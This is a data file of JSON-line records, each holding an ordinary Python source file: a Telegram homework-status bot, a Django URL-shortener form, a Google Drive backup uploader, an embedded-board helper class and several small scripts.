+{"seq_id":"155622822","text":"import logging\nimport os\nimport time\n\nimport requests\nimport telegram\nfrom dotenv import load_dotenv\n\nload_dotenv()\n\nlogging.basicConfig(\n    level=logging.DEBUG,\n    filename='main.log',\n    filemode='w',\n    format='%(asctime)s, %(levelname)s, %(name)s, %(message)s',\n)\n\nPRAKTIKUM_TOKEN = os.getenv(\"PRAKTIKUM_TOKEN\")\nAPI_URL = 'https://praktikum.yandex.ru/api/user_api/{}'\nTELEGRAM_TOKEN = os.getenv('TELEGRAM_TOKEN')\nCHAT_ID = os.getenv('TELEGRAM_CHAT_ID')\n\n\ndef parse_homework_status(homework: dict) -> str:\n    homework_name = homework.get('homework_name')\n    
homework_status = homework.get('status')\n\n if homework_name is None or homework_status is None:\n message = 'Не удалось получить данные.'\n logging.error(message)\n return message\n\n if homework_status == 'rejected':\n verdict = 'К сожалению в работе нашлись ошибки.'\n elif homework_status == 'approved':\n verdict = ('Ревьюеру всё понравилось, можно '\n 'приступать к следующему уроку.')\n elif homework_status == 'reviewing':\n verdict = 'Работа взята в ревью.'\n else:\n message = (f'У работы \"{homework_name}\" неизвестный '\n f'статус: {homework_status}.')\n logging.error(message)\n return message\n\n return f'У вас проверили работу \"{homework_name}\"!\\n\\n{verdict}'\n\n\ndef get_homework_statuses(current_timestamp: int) -> dict:\n params = {'from_date': current_timestamp, }\n headers = {'Authorization': 'OAuth ' + PRAKTIKUM_TOKEN, }\n\n try:\n api_url = API_URL.format('homework_statuses/')\n homework_statuses = requests.get(api_url, params, headers=headers)\n return homework_statuses.json()\n\n except Exception as e:\n message = f'Не удалось получить данные. Возникла ошибка: {e}.'\n logging.error(message)\n\n return {}\n\n\ndef send_message(message: str, bot_client):\n logging.info('Сообщение отправлено')\n return bot_client.send_message(CHAT_ID, message)\n\n\ndef main():\n bot = telegram.Bot(token=TELEGRAM_TOKEN)\n logging.debug('Бот запущен.')\n timestamp = int(time.time())\n\n while True:\n try:\n homework_statuses = get_homework_statuses(timestamp)\n homeworks = homework_statuses.get('homeworks')\n if homeworks:\n send_message(parse_homework_status(homeworks[0]), bot)\n timestamp = homework_statuses.get('current_date', int(time.time()))\n time.sleep(30)\n\n except Exception as e:\n message = f'Бот столкнулся с ошибкой: {e}'\n logging.error(message)\n send_message(message, bot)\n time.sleep(60)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"notifier-bot.py","file_name":"notifier-bot.py","file_ext":"py","file_size_in_byte":2941,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"650786007","text":"#!/usr/bin/env python3\n\nimport collections\nimport pathlib\nimport pickle\nimport sys\n\nimport pandas as pd\nfrom tqdm import tqdm\ntqdm.pandas()\n\nimport utils\n\n# Variables\nVOCABULARY_SIZE = 10000\nTAG_SIZE = 250\n\nOUTPUT_PATH = pathlib.Path(__file__).parent.joinpath('../../output/').resolve()\nOUTPUT_PATH.mkdir(parents=True, exist_ok=True)\n\nif __name__ == '__main__':\n \"\"\"\n Builds vocabulary list and tag list from input dataset\n \"\"\"\n\n dataset = pathlib.Path(sys.argv[1])\n\n vocabulary = collections.Counter()\n tags = collections.Counter()\n\n print(f'Opening {dataset} ...')\n df = pd.read_csv(dataset).dropna()\n\n print(f'Counting words and tags ...')\n words = (w for s in df['body'].astype(str) for w in s.split())\n df['tags'] = df['tags'].str.split(\"|\", expand=False)\n vocabulary.update(words)\n tags.update((t for l in df['tags'] for t in l))\n\n vocabulary = {\n w: i for (w, _), i in zip(vocabulary.most_common(VOCABULARY_SIZE), range(VOCABULARY_SIZE))\n }\n tags = {\n w: i for (w, _), i in zip(tags.most_common(TAG_SIZE), range(TAG_SIZE))\n }\n\n # Saving data\n with (OUTPUT_PATH / 'vocabulary.pkl').open('wb') as f:\n print(f'Saving vocabulary to {f.name} ...')\n pickle.dump(file=f, obj=vocabulary)\n with (OUTPUT_PATH / 'tags.pkl').open('wb') as f:\n print(f'Saving tags to {f.name} ...')\n pickle.dump(file=f, 
obj=tags)\n","sub_path":"model/src/preprocessing/build_vocabulary.py","file_name":"build_vocabulary.py","file_ext":"py","file_size_in_byte":1409,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"347942248","text":"import os\nouFile = open('Tophat-mapping-filter.sh', 'w')\nFs = os.listdir('.')\nL1 = []\nL2 = []\nfor F in Fs:\n if os.path.isdir(F):\n bam = F + '/' + 'accepted_hits.bam'\n bam_filtered = F + '.bam'\n s1 = 'samtools view -bh %s -q 50 -o %s'%(bam, bam_filtered)\n s2 = '#rm %s'%bam\n L1.append(s1)\n L2.append(s2)\nfor item in L1:\n ouFile.write(item + '\\n')\nfor item in L2:\n ouFile.write(item + '\\n')\nouFile.close()\n","sub_path":"mTECs/14-RNASeq/02-mapping/02-quality.py","file_name":"02-quality.py","file_ext":"py","file_size_in_byte":455,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"301824181","text":"# Django Imports\nfrom django import forms\nfrom django.core.exceptions import ValidationError\nfrom django.utils.safestring import mark_safe\nfrom django.utils import timezone\n\n# App Imports\nfrom go.models import URL, RegisteredUser\n\n# Other Imports\nfrom crispy_forms.helper import FormHelper\nfrom crispy_forms.layout import Layout, Fieldset, Submit, HTML, Div, Field\nfrom crispy_forms.bootstrap import StrictButton, PrependedText, Accordion, AccordionGroup\nfrom bootstrap3_datetime.widgets import DateTimePicker\nfrom datetime import date, datetime, timedelta\n\n\"\"\"\n The form that is used in URL creation.\n\"\"\"\nclass URLForm(forms.ModelForm):\n\n # Prevent redirect loop links\n def clean_target(self):\n # get the entered target link\n target = self.cleaned_data.get('target')\n # if the host (go.gmu.edu) is in the entered target link\n if self.host in target:\n raise ValidationError(\"You can't make a Go link to Go silly!\")\n else:\n return target\n\n # Custom target URL field\n target = forms.URLField(\n required=True,\n label='Long URL (Required)',\n max_length=1000,\n widget=forms.URLInput(attrs={\n 'placeholder': 'https://yoursite.com/'\n })\n )\n\n # Check to make sure the short url has not been used\n def unique_short(value):\n try:\n # if we're able to get a URL with the same short url\n URL.objects.get(short__iexact=value)\n except URL.DoesNotExist:\n return\n # then raise a ValidationError\n raise ValidationError('Short url already exists.')\n\n # Custom short-url field with validators.\n short = forms.SlugField(\n required = False,\n label = 'Short URL (Optional)',\n widget = forms.TextInput(),\n validators = [unique_short],\n max_length = 20,\n min_length = 3,\n )\n\n # define some string date standards\n DAY = '1 Day'\n WEEK = '1 Week'\n MONTH = '1 Month'\n CUSTOM = 'Custom Date'\n NEVER = 'Never'\n\n # define a tuple of string date standards to be used as our date choices\n EXPIRATION_CHOICES = (\n (DAY, DAY),\n (WEEK, WEEK),\n (MONTH, MONTH),\n (NEVER, NEVER),\n (CUSTOM, CUSTOM),\n )\n\n # Add preset expiration choices.\n expires = forms.ChoiceField(\n required = True,\n label = 'Expiration (Required)',\n choices = EXPIRATION_CHOICES,\n initial = NEVER,\n widget = forms.RadioSelect(),\n )\n\n # Check if the selected date is a valid date\n def valid_date(value):\n # a valid date is one that is greater than today\n if value > timezone.now():\n return\n # raise a ValidationError if the date is invalid\n else:\n raise ValidationError('Date must be after today.')\n\n\n # Add a custom expiration choice.\n expires_custom = forms.DateTimeField(\n 
required = False,\n label = 'Custom Date',\n input_formats = ['%m-%d-%Y'],\n validators = [valid_date],\n initial = lambda: datetime.now() + timedelta(days=1),\n widget = DateTimePicker(\n options={\n \"format\": \"MM-DD-YYYY\",\n \"pickTime\": False,\n },\n icon_attrs={\n \"class\": \"fa fa-calendar\",\n },\n )\n )\n\n # on initialization of the form, crispy forms renders this layout\n def __init__(self, *args, **kwargs):\n # Grab that host info\n self.host = kwargs.pop('host', None)\n super(URLForm, self).__init__(*args, **kwargs)\n # Define the basics for crispy-forms\n self.helper = FormHelper()\n self.helper.form_method = 'POST'\n\n # Some xtra vars for form css purposes\n self.helper.form_class = 'form-horizontal'\n self.helper.label_class = 'col-md-1'\n self.helper.field_class = 'col-md-6'\n\n # The main \"layout\" defined\n self.helper.layout = Layout(\n Fieldset('',\n #######################\n Accordion(\n # Step 1: Long URL\n AccordionGroup('Step 1: Long URL',\n Div(\n HTML(\"\"\"\n <h4>Paste the URL you would like to shorten:</h4>\n <br />\"\"\"),\n 'target',\n style=\"background: rgb(#F6F6F6);\"),\n active=True,\n template='crispy/accordian-group.html'),\n\n # Step 2: Short URL\n AccordionGroup('Step 2: Short URL',\n Div(\n HTML(\"\"\"\n <h4>Create a custom Go address:</h4>\n <br />\"\"\"),\n PrependedText(\n 'short', 'https://go.gmu.edu/', template='crispy/customPrepended.html'),\n style=\"background: rgb(#F6F6F6);\"),\n active=True,\n template='crispy/accordian-group.html',),\n\n # Step 3: Expiration\n AccordionGroup('Step 3: URL Expiration',\n Div(\n HTML(\"\"\"\n <h4>Set when you would like your Go address to expire:</h4>\n <br />\"\"\"),\n 'expires',\n Field('expires_custom', template=\"crispy/customDateField.html\"),\n style=\"background: rgb(#F6F6F6);\"),\n active=True,\n template='crispy/accordian-group.html'),\n\n # FIN\n template='crispy/accordian.html'),\n #######################\n HTML(\"\"\"\n <br />\"\"\"),\n StrictButton('Shorten', css_class=\"btn btn-primary btn-md col-md-4\", type='submit')))\n\n # metadata about this ModelForm\n class Meta:\n # what model this form is for\n model = URL\n # what attributes are included\n fields = ['target',]\n\n\"\"\"\n The form that is used when a user is signing up to be a RegisteredUser\n\"\"\"\nclass SignupForm(forms.ModelForm):\n\n # The full name of the RegisteredUser\n full_name = forms.CharField(\n required = True,\n label = 'Full Name (Required)',\n max_length = 100,\n widget = forms.TextInput(),\n )\n\n # The RegisteredUser's chosen organization\n organization = forms.CharField(\n required = True,\n label = 'Organization (Required)',\n max_length = 100,\n widget = forms.TextInput(),\n )\n\n # The RegisteredUser's reason for signing up to us Go\n description = forms.CharField(\n required = False,\n label = 'Description (Optional)',\n max_length = 200,\n widget = forms.Textarea(),\n )\n\n # A user becomes registered when they agree to the TOS\n registered = forms.BooleanField(\n required=True,\n # ***Need to replace lower url with production URL*** ie. 
go.gmu.edu/about#terms\n label = mark_safe('Do you accept the <a href=\"http://127.0.0.1:8000/about#terms\">Terms of Service</a>?'),\n )\n\n # on initialization of the form, crispy forms renders this layout\n def __init__(self, request, *args, **kwargs):\n # Necessary to call request in forms.py, is otherwise restricted to views.py and models.py\n self.request = request\n super(SignupForm, self).__init__(*args, **kwargs)\n self.helper = FormHelper()\n self.helper.form_class = 'form-horizontal'\n self.helper.label_class = 'col-md-4'\n self.helper.field_class = 'col-md-6'\n\n self.helper.layout = Layout(\n Fieldset('',\n Div(\n # Place in form fields\n Div(\n 'full_name',\n 'organization',\n 'description',\n 'registered',\n css_class='well'),\n\n # Extras at bottom\n StrictButton('Submit',css_class='btn btn-primary btn-md col-md-4', type='submit'),\n css_class='col-md-6')))\n\n # metadata about this ModelForm\n class Meta:\n # what model this form is for\n model = RegisteredUser\n # what attributes are included\n fields = ['full_name', 'organization', 'description', 'registered',]\n","sub_path":"go/go/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":8550,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"316497872","text":"from __future__ import absolute_import\nimport os\nimport logging\nimport importlib\nimport mbed_lstools\nfrom mcutk.debugger.base import DebuggerBase\nfrom mcutk.pserial.serial import Serial\n\n\ndef getboard(name, **kwargs):\n \"\"\"An entry to get board instance.\n\n Arguments:\n name {string} -- board name\n \"\"\"\n devicename = kwargs.pop(\"devicename\", \"\")\n try:\n boardmodule_path = \"mcutk.board.%s\"%name\n logging.debug(boardmodule_path)\n boardmodule = importlib.import_module(boardmodule_path)\n board = boardmodule.Board(devicename, **kwargs)\n except ImportError as e:\n board = Board(devicename, **kwargs)\n\n logging.debug(str(board))\n board.name = name\n return board\n\n\n\n\nclass Board(object):\n \"\"\"MCUTK base board. 
Defined common interface & functions.\n    This object can be used directly and provides general support for Kinetis series.\n    \"\"\"\n    def __init__(self, devicename=None, **kwargs):\n        \"\"\"Create a mcutk.Board instance.\n\n        Arguments:\n            devicename {string} -- device name\n            interface {string} -- SWD/JTAG\n\n        Keyword Arguments:\n            debugger_type {string} -- debugger type, choices are defined in\n        \"\"\"\n        self.name = devicename\n        self.devicename = devicename\n        self._debugger = None\n        self._serial_ports = list()\n\n        self.interface = kwargs.get(\"interface\", \"SWD\")\n        self.debugger_type = kwargs.get(\"debugger_type\", \"jlink\")\n\n        # default gdbport is 3333\n        self.gdbport = kwargs.get(\"gdbport\", 3333)\n        self.usbid = kwargs.get(\"usbid\")\n        self.serial = kwargs.get(\"serial\", \"\")\n        self.baudrate = kwargs.get(\"baudrate\", \"115200\")\n        self.start_address = kwargs.get(\"start_address\", \"0\")\n\n        self.sp = None #\"(0x00000000)\"\n        self.pc = None #\"(0x00000004)\"\n        self.resource = []\n\n\n    def __repr__(self):\n        return \"<{0}(name={1.devicename}, usbid={1.usbid})>\".format(self.__class__.__name__, self)\n\n\n    def get_mount_point(self):\n        \"\"\"Return mount point by matching usbid.\n        \"\"\"\n        mbeds = mbed_lstools.create()\n        mbeds_devices = mbeds.list_mbeds(filter_function=lambda m: m[\"target_id\"] in self.usbid)\n        if not mbeds_devices:\n            return\n        return mbeds_devices[0]['mount_point']\n\n\n    def set_serial(self, port, baudrate, **kwargs):\n        \"\"\"Set or add serial port to board object, this interface will pass all\n        parameters to serial.Serial object. For more details, please refer to pyserial\n        documentation: https://pythonhosted.org/pyserial/pyserial_api.html#classes.\n\n        Default timeout=1.\n        \"\"\"\n        if not port:\n            return None\n        timeout = kwargs.pop('timeout', 1)\n        sp = Serial(timeout=timeout, **kwargs)\n        sp.port = port\n        sp.baudrate = baudrate\n        self._serial_ports.append(sp)\n\n\n    def get_serial(self, index=0):\n        \"\"\"Get serial port instance by index.\n            0 -- main\n            1 -- secondary\n            2 -- third\n\n        Arguments:\n            index {int} -- the port index.\n\n        Returns:\n            serial.Serial instance,\n        \"\"\"\n        if not self._serial_ports:\n            logging.debug('no serial ports are configured!')\n            return None\n\n        try:\n            return self._serial_ports[index]\n        except IndexError:\n            return None\n\n    def remove_resource(self, res_inst):\n        for res in self.resource:\n            if id(res[1]) == id(res_inst):\n                logging.debug(\"removing resource for %s\", id(res_inst))\n                self.resource.remove(res)\n                return res\n\n        logging.warning(\"resource for %s not found\", id(res_inst))\n        return None\n\n\n    def register_resource(self, res_inst, naming):\n        \"\"\"\n        Register a resource with the board.\n        res_inst: resource instance\n        naming: name string of this resource\n        \"\"\"\n        res = [naming, res_inst]\n\n        self.resource.append(res)\n\n\n    def find_resource_by_name(self, naming):\n        \"\"\"\n        Find a resource by name.\n        naming: the name of the resource\n        return: the first matching resource or None\n        \"\"\"\n        for res in self.resource:\n            if res[0] == naming:\n                return res[1]\n\n        logging.debug(\"resource for %s not found\", naming)\n        return None\n\n\n    def find_resource_by_type(self, type_string):\n        \"\"\"\n        Find resources by type.\n        type_string: the name of the resource type (class)\n        return: a list of matched resources, otherwise None\n        \"\"\"\n        ret = []\n        for res in self.resource:\n            if type(res[1]).__name__ == type_string:\n                logging.info(\"found resource for %s\", type_string)\n                ret.append(res[1])\n\n        if ret:\n            return ret\n\n        logging.info(\"resource for %s not found\", type_string)\n        return None\n\n\n    
@property\n    def debugger(self):\n        if not self._debugger:\n            raise ValueError(\"debugger is not set!\")\n        self._debugger.set_board(self)\n        return self._debugger\n\n\n    @debugger.setter\n    def debugger(self, value):\n        if isinstance(value, DebuggerBase):\n            self._debugger = value\n        else:\n            raise ValueError(\"this is not a valid debugger object\")\n\n\n    @property\n    def gdb_init_commands(self):\n        \"\"\"gdb.init is a string of gdb commands.\n\n        It is rendered before executing 'gdb -x gdb.init'.\n        By default it is loaded from debugger.gdbinit_template.\n        Override this property to customize the commands.\n        \"\"\"\n        return None\n\n\n    @property\n    def ser_main(self):\n        \"\"\"A shortcut attribute to access the main serial port object.\n        \"\"\"\n        return self.get_serial(0)\n\n\n    @property\n    def ser_sec(self):\n        \"\"\"A shortcut attribute to access the secondary serial port object.\n        \"\"\"\n        return self.get_serial(1)\n\n    def reset_board_by_send_break(self, serial=None):\n        \"\"\"CMSIS-DAP firmware allows the target to be reset by sending a break command\n        over the serial port.\n        Defaults to the main serial port.\n        \"\"\"\n        if serial is None:\n            serial = self.ser_main\n\n        logging.info('reset board by sending break to port: %s', serial.port)\n        _opened_by_me = False\n        if not serial.is_open:\n            _opened_by_me = True\n            serial.open()\n\n        try:\n            serial.send_break()\n        except:\n            serial.break_condition = False\n\n        # keep the port status aligned with its original state\n        if _opened_by_me:\n            serial.close()\n\n        return True\n\n\n\n    def reset(self, method=\"debugger\"):\n        \"\"\"Reset board. There are several methods that allow the user to reset the board.\n        By default it is the debugger method.\n\n        Reset method list:\n            - debugger: use debugger(JTAG) to reset board\n            - serial: send break via serial port\n\n        Keyword Arguments:\n            method {str} -- reset method (default: {\"debugger\"})\n        \"\"\"\n        if method == 'serial':\n            return self.reset_board_by_send_break()\n\n        elif method == \"debugger\":\n            assert self.debugger\n            return self.debugger.reset()\n\n        else:\n            raise ValueError('unknown reset method %s' % method)\n\n\n    def programming(self, filename, **kwargs):\n        \"\"\"Auto program binary to board.\n\n        For general situations, it is available for most boards.\n        It will choose the gdb or general method by filename extension.\n\n        params:\n            filename: path to image file.\n        \"\"\"\n        logging.info(\"debugger version %s\", self.debugger.version)\n        logging.info(\"programming %s\", filename)\n        ext = os.path.splitext(filename)[-1]\n        if self.debugger_type in (\"jlink\", 'pyocd'):\n            if ext in (\".bin\", \".img\"):\n                return self.debugger.flash(filename, self.start_address)\n            else:\n                return self.debugger.gdb_program(filename, **kwargs)\n        else:\n            return self.debugger.flash(filename, **kwargs)\n\n\n    def check_serial(self):\n        \"\"\"Check serial port.\n        \"\"\"\n        status = \"pass\"\n        try:\n            self.ser_main.write_timeout = 2\n            self.ser_main.open()\n            self.ser_main.write(\"A\\r\\n\")\n        except Exception as e:\n            status = str(e)\n        finally:\n            if self.ser_main and self.ser_main.is_open:\n                self.ser_main.close()\n\n        return status\n\n\n","sub_path":"mcutk/board/baseboard.py","file_name":"baseboard.py","file_ext":"py","file_size_in_byte":8521,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"210098389","text":"#!/usr/bin/python\n# -*- coding: utf8 -*-\n\nfrom __future__ import print_function, division\n\nimport astropy.io.fits as pyfits\nimport numpy\nimport numpy.fft as fft\nimport matplotlib.pyplot as plt\n\n\n__author__ = 'Bruno Quint'\n\nif __name__ 
if __name__ == '__main__':
\n
\n    # Load data
\n    filename = '/data/BTFI/20140402/BIAS/classic-mode/sbiasA0002.fits'
\n    header = pyfits.getheader(filename)
\n    data = pyfits.getdata(filename)
\n
\n    fft_data = fft.fft2(data)
\n    # keep the real part of the shifted spectrum for display
\n    fft_data = fft.fftshift(fft_data).real
\n
\n    vmin = fft_data.mean() - 3 * fft_data.std()
\n    vmax = fft_data.mean() + 3 * fft_data.std()
\n    plt.imshow(fft_data, origin='lower', cmap='coolwarm', interpolation='nearest', vmin=vmin, vmax=vmax)
\n    plt.colorbar()
\n    plt.show()
\n
\n
\n
\n
\n","sub_path":"bias_fft.py","file_name":"bias_fft.py","file_ext":"py","file_size_in_byte":728,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"579350277","text":"from __future__ import print_function
\nimport sys
\nimport os
\nimport time
\nfrom googleapiclient.discovery import build
\nfrom httplib2 import Http
\nfrom oauth2client import file, client, tools
\nfrom apiclient.http import MediaFileUpload
\nimport datetime
\nimport json
\n
\n
\n# If modifying these scopes, delete the file token.json.
\n# full scope : https://www.googleapis.com/auth/drive
\nSCOPES = 'https://www.googleapis.com/auth/drive.file'
\n
\nclass BackupManager:
\n    now = datetime.datetime.now()
\n    scopes = 'https://www.googleapis.com/auth/drive.file'
\n    config_path = 'push2drive_config/config.json'
\n    credentials_path = 'push2drive_config/credentials.json'
\n    token_path = 'push2drive_config/token.json'
\n    config = 0
\n    drive_service = 0
\n
\n
\n    backup_number = 0
\n    main_folder_id = 0
\n    destination_folder_id = 0
\n    backup_folder_id = 0
\n
\n    def __init__(self, path):
\n        self.config_path = os.path.join(path, 'push2drive_config/config.json')
\n        self.credentials_path = os.path.join(path, 'push2drive_config/credentials.json')
\n
\n    def read_config(self):
\n        with open(self.config_path) as json_data_file:
\n            self.config = json.load(json_data_file)
\n        return self.config
\n
\n    def connect_drive(self):
\n        store = file.Storage(self.config['token_path'])
\n        creds = store.get()
\n        if not creds or creds.invalid:
\n            flow = client.flow_from_clientsecrets(self.credentials_path, SCOPES)
\n            creds = tools.run_flow(flow, store)
\n        self.drive_service = build('drive', 'v3', http=creds.authorize(Http()))
\n
\n    def check_main_folder(self):
\n        # Search for the main backup folder in drive
\n        main_folder_name = self.config['main_folder_name']
\n        print('Search main backup folder in drive (name:%s)' % main_folder_name)
\n        results = self.drive_service.files().list(q=\"name='%s' and mimeType='application/vnd.google-apps.folder'\" % main_folder_name,
\n                                                  orderBy='createdTime asc',
\n                                                  spaces='drive',
\n                                                  fields='nextPageToken, files(id, name)'
\n                                                  ).execute()
\n        items = results.get('files', [])
\n
\n        if not items:
\n            # No backup folder found by name
\n            print('Create main folder')
\n            file_metadata = {
\n                'name': main_folder_name,
\n                'mimeType': 'application/vnd.google-apps.folder'
\n            }
\n
\n            main_folder = self.drive_service.files().create(body=file_metadata,
\n                                                            fields='id').execute()
\n            self.main_folder_id = main_folder.get('id')
\n            print('Folder ID: %s' % self.main_folder_id)
\n        else:
\n            # Main folder exists; pick the entry whose name matches exactly
\n            for item in items:
\n                if item['name'] == main_folder_name:
\n                    self.main_folder_id = item['id']
\n                else:
\n                    print(u'{0} ({1})'.format(item['name'], item['id']))
\n
\n            print('Main folder found (id:%s)' % self.main_folder_id)
\n
\n        if self.main_folder_id == 0:
\n            raise BaseException('No main folder')
\n        return 1
\n
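\n    # Illustrative note (response shape assumed from the Drive v3 API; the ids
\n    # shown are made up): files().list resolves to a dict roughly like
\n    #   {'files': [{'id': '1AbC...', 'name': 'backup'}], 'nextPageToken': '...'}
\n    # which is why these helpers read results.get('files', []) before touching
\n    # individual entries.
\n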
\n    def check_destination_folder(self):
\n        destination_folder_name = self.config['destination_folder_name']
\n        print('Search destination folder in drive (name:%s)' % destination_folder_name)
\n        # The main folder must already exist at this point
\n        if self.main_folder_id == 0:
\n            raise BaseException('No main folder')
\n        else:
\n            # Search sub folders
\n            results = self.drive_service.files().list(q=\"'{0}' in parents and mimeType='application/vnd.google-apps.folder'\".format(self.main_folder_id),
\n                                                      orderBy='createdTime asc',
\n                                                      spaces='drive',
\n                                                      pageSize=100,
\n                                                      fields='nextPageToken, files(id, name)'
\n                                                      ).execute()
\n            items = results.get('files', [])
\n
\n            # Look for an existing folder with the expected name
\n            if items:
\n                for item in items:
\n                    if item['name'] == destination_folder_name:
\n                        self.destination_folder_id = item['id']
\n
\n            # Create the folder if it was not found
\n            if self.destination_folder_id == 0:
\n                print('Create destination folder')
\n                file_metadata = {
\n                    'name': destination_folder_name,
\n                    'mimeType': 'application/vnd.google-apps.folder',
\n                    'parents': [self.main_folder_id]
\n                }
\n
\n                destination_folder = self.drive_service.files().create(body=file_metadata,
\n                                                                       fields='id').execute()
\n                self.destination_folder_id = destination_folder.get('id')
\n
\n        if self.destination_folder_id == 0:
\n            raise BaseException('No destination folder')
\n        else:
\n            print('Destination folder found (id:%s)' % self.destination_folder_id)
\n        return 1
\n
\n    def get_backup_number(self):
\n        data = self.drive_service.files().get(fileId=self.destination_folder_id, fields=\"appProperties\").execute()
\n        print(data)
\n        if 'appProperties' in data and 'backup_number' in data['appProperties']:
\n            self.backup_number = int(data['appProperties']['backup_number']) + 1
\n            print('This is backup number %s' % self.backup_number)
\n        else:
\n            print('WARNING : No backup number found in folder metadata')
\n
\n    def save_backup_number(self):
\n        properties = {
\n            'appProperties': {
\n                'backup_number': self.backup_number
\n            }
\n        }
\n        data = self.drive_service.files().update(body=properties, fileId=self.destination_folder_id, fields=\"id, appProperties\").execute()
\n        print('New backup number saved (%s)' % self.backup_number)
\n
\n    def create_backup_folder(self, backup_number):
\n        backup_folder_name = '{0} - {1}'.format(self.backup_number, self.now.isoformat())
\n        print('Create backup folder')
\n
\n        file_metadata = {
\n            'name': backup_folder_name,
\n            'mimeType': 'application/vnd.google-apps.folder',
\n            'parents': [self.destination_folder_id],
\n            'appProperties': {
\n                'backup_number': self.backup_number
\n            }
\n        }
\n
\n        backup_folder = self.drive_service.files().create(body=file_metadata,
\n                                                          fields='id, appProperties').execute()
\n        self.backup_folder_id = backup_folder.get('id')
\n
\n        if self.backup_folder_id == 0:
\n            raise BaseException('No backup folder')
\n        else:
\n            print('Backup folder found (id:%s)' % self.backup_folder_id)
\n        return 1
\n
\n    def upload_file(self, file):
\n        print('Upload file : %s' % file)
\n
\n        if not os.path.isfile(file):
\n            raise BaseException('Backup file not found')
\n
\n        # Upload the backup file
\n        file_metadata = {
\n            'name': '{0}.{1}'.format(self.now.isoformat(), file),
\n            'parents': [self.backup_folder_id]
\n        }
\n        media = MediaFileUpload(file)
\n        drive_file = self.drive_service.files().create(body=file_metadata,
\n                                                       media_body=media,
\n                                                       fields='id').execute()
\n        print('File saved (id:%s)' % drive_file.get('id'))
\n
\n    def slack_notification(self, file):
\n        payload = \"{\\\"text\\\":\\\"Backup finished (%s)\\\"}\" % file
\n        (resp, content) = Http().request(self.config['slack_url'],
\n                                         \"POST\", body=payload,
\n                                         headers={'content-type':'application/json'})
\n
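\n    # Worked example of the rotation rule in clean() below, under an assumed
\n    # config of rotation = {'last': 5, 'modulo': [10]} and backup_number = 42:
\n    # oldest_number = 42 - 5 + 1 = 38, so backups 38..42 are kept; in addition,
\n    # any backup number divisible by 10 with number // 10 >= (42 // 10) - 1 = 3
\n    # survives, i.e. backups 30 and 40. Everything else is deleted.
\n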
\n    def clean(self):
\n        # Search sub folders
\n        results = self.drive_service.files().list(q=\"'{0}' in parents and mimeType='application/vnd.google-apps.folder'\".format(self.destination_folder_id),
\n                                                  orderBy='createdTime asc',
\n                                                  spaces='drive',
\n                                                  pageSize=100,
\n                                                  fields='nextPageToken, files(id, name, appProperties)'
\n                                                  ).execute()
\n        items = results.get('files', [])
\n
\n        # Decide which backup folders to keep
\n        keep = []
\n        oldest_number = self.backup_number - self.config['rotation']['last'] + 1
\n        if items:
\n            for item in items:
\n                # print(item['name'])
\n                if 'appProperties' in item and 'backup_number' in item['appProperties']:
\n                    old_backup_number = int(item['appProperties']['backup_number'])
\n                    if old_backup_number >= oldest_number:
\n                        print('Keep %s' % item['name'])
\n                        keep.append(item['id'])
\n                    for modulo in self.config['rotation']['modulo']:
\n                        if old_backup_number % modulo == 0 and (old_backup_number // modulo >= ((self.backup_number // modulo) - 1)):
\n                            print('Keep %s' % item['name'])
\n                            keep.append(item['id'])
\n            for item in items:
\n                if 'appProperties' in item and 'backup_number' in item['appProperties']:
\n                    delete = True
\n                    for k in keep:
\n                        if item['id'] == k:
\n                            delete = False
\n                            break
\n                    if delete:
\n                        print('Delete %s' % item['name'])
\n                        data = self.drive_service.files().delete(fileId=item['id'], fields=\"id\").execute()
\n
\n    def backup(self, files_to_backup):
\n        print(self.config_path)
\n        print(self.credentials_path)
\n        self.check_main_folder()
\n        self.check_destination_folder()
\n        self.get_backup_number()
\n        self.create_backup_folder(self.backup_number)
\n        print('Start Backup')
\n        for file in files_to_backup:
\n            self.upload_file(file)
\n        self.slack_notification('{0} - {1}'.format(self.config['destination_folder_name'], self.backup_number))
\n        self.save_backup_number()
\n        self.clean()
\n        time.sleep(3)
\n        return 1
\n
\ndef main():
\n    script_path = os.path.realpath(sys.path[0])
\n    files_to_backup = []
\n
\n    if len(sys.argv) == 1:
\n        raise BaseException('Missing Arguments')
\n    else:
\n        i = 1
\n        while i < len(sys.argv):
\n            files_to_backup.append(sys.argv[i])
\n            i += 1
\n
\n    backup_manager = BackupManager(script_path)
\n    backup_manager.read_config()
\n    backup_manager.connect_drive()
\n    backup_manager.check_main_folder()
\n    backup_manager.check_destination_folder()
\n    backup_manager.get_backup_number()
\n
\nif __name__ == '__main__':
\n    main()
\n","sub_path":"scripts/get_token.py","file_name":"get_token.py","file_ext":"py","file_size_in_byte":11036,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"364432829","text":"
\ndef cel_to_fah(deg_in_cel):
\n    deg_in_fah = deg_in_cel * 9 / 5 + 32
\n    return deg_in_fah
\n
\ntemperatures = [10, -20, -289, 100]
\n
\nfor deg in temperatures:
\n    if deg < -273.15:
\n        print(\"Temperature cannot be lower than -273.15\")
\n    else:
\n        print(cel_to_fah(deg))
\n","sub_path":"scripts/Section5/exercise4.py","file_name":"exercise4.py","file_ext":"py","file_size_in_byte":265,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"1043913","text":"
\n#from evaluate_query import *
\nfrom yadi.dataStructures.query import *
\nfrom yadi.dataStructures.relation import *
\nfrom yadi.dataStructures.element import *
\nfrom yadi.dataStructures.constraint import *
\nfrom yadi.queryExecutor.queryExecutor import *
\nfrom yadi.queryExecutor.sqlFactory import *
\n
\n
\ndef test(list_queries):
\n    gen = SQLGenerator()
\n    for i in range(0, len(list_queries)):
\n        print('Test :' + str(i))
\n        print('Original:')
\n        print(str(list_queries[i]))
\n        print('Result:')
\n        try:
\n            print(QueryExecutor().execute_query(list_queries[i]))
\n        except Exception as e:
\n            print(e)
\n        print('---------------------------------------------------------')
\n
\n
\n
\nqueries = []
\n
